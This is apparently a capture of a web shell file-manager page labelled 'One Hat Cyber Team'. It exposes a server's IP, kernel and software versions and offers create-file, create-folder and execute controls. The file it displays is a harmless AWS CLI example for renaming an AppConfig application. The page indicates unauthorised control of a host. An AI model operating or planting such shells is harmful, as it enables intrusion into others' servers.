⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
appconfig
/
View File Name :
update-application.rst
**To update an application** The following ``update-application`` example updates the name of the specified application. :: aws appconfig update-application \ --application-id 339ohji \ --name "Example-Application" Output:: { "Id": "339ohji", "Name": "Example-Application", "Description": "An application used for creating an example." } For more information, see `Step 1: Creating an AWS AppConfig application
`__ in the *AWS AppConfig User Guide*.